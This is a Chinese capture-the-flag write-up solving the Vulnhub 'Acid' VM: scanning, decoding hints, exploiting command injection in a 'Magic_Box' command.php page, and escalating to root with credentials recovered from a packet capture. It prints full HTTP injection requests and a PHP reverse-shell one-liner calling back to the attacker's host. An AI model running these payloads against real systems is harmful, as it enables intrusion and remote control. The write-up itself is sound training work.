首页 > 其他分享 >Vulnhub_Acid_wp

Vulnhub_Acid_wp

时间:2023-07-02 22:55:25浏览次数:52  
标签:20.146 php http 查看 33447 192.168 Vulnhub wp Acid

前言

靶机下载地址:https://download.vulnhub.com/acid/Acid.rar

靶机探测

nmap -sn 192.168.20.0/24
image
192.168.20.146是新出现得ip所以为靶机ip

详细信息扫描

nmap -A -p- 192.168.20.146
image

漏洞扫描

nmap

nmap -p 33447 --script=vuln 192.168.20.146
image

nikto

nikto -h 192.168.20.146:33447
image

漏洞扫描没有任何收获

web信息收集

先访问web页面
image
英文得意思为使用钥匙打开魔法之门
查看网页源码
image
发现16进制

解码

0x643239334c6d70775a773d3d
image
转换后发现为base64编码
d293LmpwZw==
image
解码后发现为文件名
wow.jpg
访问该文件名
image
可以发现无法访问

dirb

dirb http://192.168.20.146:33447

image

这里可以看到有images文件名,后跟wow.jpg查看文件
image
可以看到图片了,显示成功看来钥匙就在图片之中,将图片保存在本地
image
asccii码转换16进制
37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34
转换后结果
7aee0f6d588ed9905ee37f16a7c610d4
为md5解密为
image
63425
这个应该就是key

dirsearch

dirsearch -u http://192.168.20.146:33447/
image

gobuster

gobuster dir -u http://192.168.20.146:33447/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
这里使用了小字典
image
可以发现多了一个目录,加上这个目录继续扫描
gobuster dir -u http://192.168.20.146:33447/Challenge -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
image

image
访问目录可以发现为登录框
不过不知道账号密码,所以暂且放下
换个大号字典继续爆破
image
换回dirsearch继续扫描
image
image
挨个访问查看一下
image
image
image
这里可以看到用户邮箱,尝试弱口令和之前拿到得key登录
image
尝试无果
image
访问
image
发现没有东西
访问include.php
image
发现需要登录才可访问
查看wp,发现有目录修改字典文件,重新扫描
image
访问该文件
image
发现提示新的目录,继续扫描
image
访问
image

很眼熟得rce

Rce漏洞

点击查看payload
POST /Challenge/Magic_Box/command.php HTTP/1.1

Host: 192.168.20.146:33447

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.146:33447/Challenge/Magic_Box/command.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 33

Origin: http://192.168.20.146:33447

Connection: close

Cookie: sec_session_id=eceq094uhhv2jvjpfa9gb3fq34

Upgrade-Insecure-Requests: 1

Pragma: no-cache

Cache-Control: no-cache



IP=127.0.0.1;whoami&submit=submit

image

image

反弹shell

kali开启nc监听
nc -lvvp 1234
通过php反弹shell
php -r '$sock=fsockopen("192.168.20.135",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
将上述命令进行url编码,使用burpsuite发包
image

点击查看payload
POST /Challenge/Magic_Box/command.php HTTP/1.1

Host: 192.168.20.146:33447

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.146:33447/Challenge/Magic_Box/command.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

Origin: http://192.168.20.146:33447

Connection: close

Cookie: sec_session_id=eceq094uhhv2jvjpfa9gb3fq34

Upgrade-Insecure-Requests: 1

Pragma: no-cache

Cache-Control: no-cache



IP=127.0.0.1;php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.20.135%22%2C1234%29%3Bexec%28%22/bin/sh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&submit=submit
![image](/i/l/?n=23&i=blog/2830174/202307/2830174-20230702222229336-2137241061.png)

可以发现没有问题
提高一下shell交互性
export TERM=xterm-color
image

发现可以完成清屏

python -c "import pty;pty.spawn('/bin/bash')"
让shell完整一点
image

提权

sudo -l
查看当前用户可以执行那些命令
image
看来此方法不行

查看/etc/passwd文件
image
image
在/etc/passwd 处查看到三个可以关注的用户分别是: root、saman、acid
分别查看3个用户下面得文件
find / -user acid 2>/dev/null
在acid这个用户中
image
发现hint
kali开启ssh,使用scp传送流量包
开启ssh命令
service ssh start
image

scp传输命令
scp hint.pcapng [email protected]:/home/kali/Desktop

image
image
传输完成
过滤TCP流量,追踪流量发现用户名和密码
image
用户名:saman
密码:1337hax0r
切换用户到saman
image
执行sudo -l查看
image
sudo提权
sudo su root
image
image
可以发现没有问题
查看flag
image

点击查看flag
cat /root/flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143

标签:20.146,php,http,查看,33447,192.168,Vulnhub,wp,Acid
From: https://www.cnblogs.com/zy4024/p/Vulnhub_Acid_wp.html

相关文章

  • 粗心的小红qsnctfwp
    将原apk安装包后缀名修改为zip将其中的classes3.dex文件解压使用Notepad++或其他工具打开classes3.dex,将第2行的38修改为35或36后保存使用dex2jar工具将classes3.dex转换为classes3-dex2jar.jar使用jd-gui工具打开classes3-dex2jar.jar在com.m0xi......
  • wpf 资源字典 换肤
    介绍一下wpf中给控件更改样式的集中方法,只用button演示,其他控件相同1.使用代码更改button的style定义button的style1<StyleTargetType="Button"x:Key="buttonstyle1"><SetterProperty="Background"Value="LightBlue"/>&l......
  • WPF复习知识点记录
    WPF复习知识点记录由于近几年主要在做Web项目,客户端的项目主要是以维护为主,感觉对于基础知识的掌握没有那么牢靠,趁着这个周末重新复习下WPF的相关知识。文章内容主要来自大佬刘铁锰老师的经典著作《深入浅出WPF》。因为是复习,所以知识内容不会一一记录,如有需要了解更多可以看书......
  • Vulnhub: EvilBox:One靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130secret目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130/secret/-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-li......
  • 用Wpf做一个Block编程画板(续5-Diagram画板,仿Scratch)
    用Wpf做一个Block编程画板(续5-Diagram画板)先上一张效果动图,本次更新主要仿照Scratch,目前仅完成拖拽部分,逻辑部分后续完善。同样老规矩,先上源码地址:https://gitee.com/akwkevin/aistudio.-wpf.-diagram本次扩展主要内容:1.Block模块,入口在文件新建下。2.简易Block的使用:......
  • [WPF]静态资源(StaticResource)和动态资源(DynamicResource)
    一、文章概述本演示介绍了WPF的静态资源和动态资源的基本使用,并对两者做了简单的比较。静态资源(StaticResource)指的是在程序载入内存时对资源的一次性使用,之后就不再访问这个资源了;动态资源(DynamicResource)使用指的是在程序运行过程中然会去访问资源。相关下载(代码、屏幕录像):h......
  • wpf checkbox控件模板
    先看一下上一篇文章:wpfbutton控件模板。再看此文会更好理解  vs生产的checkbox控件模板有很长,我们直接找到controltemplate标签,和controltemplate.triggers。控件模板都先找这两个地方看一下布局和触发器既可以了。剩下的都是定义的一些资源和样式。checkbox的控件模板中定......
  • #WPS AI# AI写出了么高级的一个公式,太赞了!
    以前,我曾经问过Claude一个问题:把所有数字变成9。Claude的回答是1直接输入9;2用替换;3用公式……Claude的话很多的,我不一一例举了,不得不说,大部分都是对的,但是其中夹了一句:把3翻转成9,我想了好几天没想明白3翻转一下怎么变成9。好吧,Claude有Claude的优势,我们也不多批评它了。今天,......
  • WPS与OFFICE的差异
    WPS与OFFICE的差异会越来越大,此篇也不是为了把所有的差异都列出来,而是就一些容易被老板扔文件夹到头上的问题拎出来……IF函数Office中If函数第二/三参数光挂一个逗号时,返回的结果是0,内部的运算结果也是0;而WPS同样的公式,虽然单独IF的结果仍是0,但其实际计算为空。未完待续……......
  • wpf button控件模板
    1.从button的style说起button有很多属性,我们在xaml中定义一个按钮时可以指定button的content、background、height、width等等。这些都是button的属性,而style也不例外也是button的一个属性,只是在给style属性赋值时不能简单的像height=“100”一样简单的设定一个字符串。先看......